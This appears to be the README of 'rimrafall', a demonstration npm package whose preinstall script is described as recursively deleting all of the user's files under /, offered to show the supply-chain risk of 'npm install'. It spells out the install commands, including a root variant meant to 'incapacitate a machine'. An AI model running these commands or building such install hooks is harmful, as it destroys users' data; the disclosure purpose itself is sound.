This is to show that npm install can be as dangerous as curl dangerous.com | sh.
It was taken off the npm registry, but that solves nothing really: anyone could make a malicious module like this and mask it as a useful module that has a desired use case. Let's try to find ways to really make npm safe ;)
No, I did not name this package rimrafall, submit it to HN, clearly state what it does and clearly tell people not to install it with the purpose of having people delete stuff on their computers.
npm install rimrafall
It has a preinstall script that will delete all the files and folders your current user owns, recursively, in /.
e.g., you need to completely incapacitate a machine (but please do heed the warning above):
sudo su -
npm install rimrafall
You might see lots of error messages like these:
rm: cannot remove `/sys/block/sda': Operation not permitted
rm: cannot remove `/sys/block/dm-0': Operation not permitted
rm: cannot remove `/sys/block/dm-1': Operation not permitted
which can safely be ignored.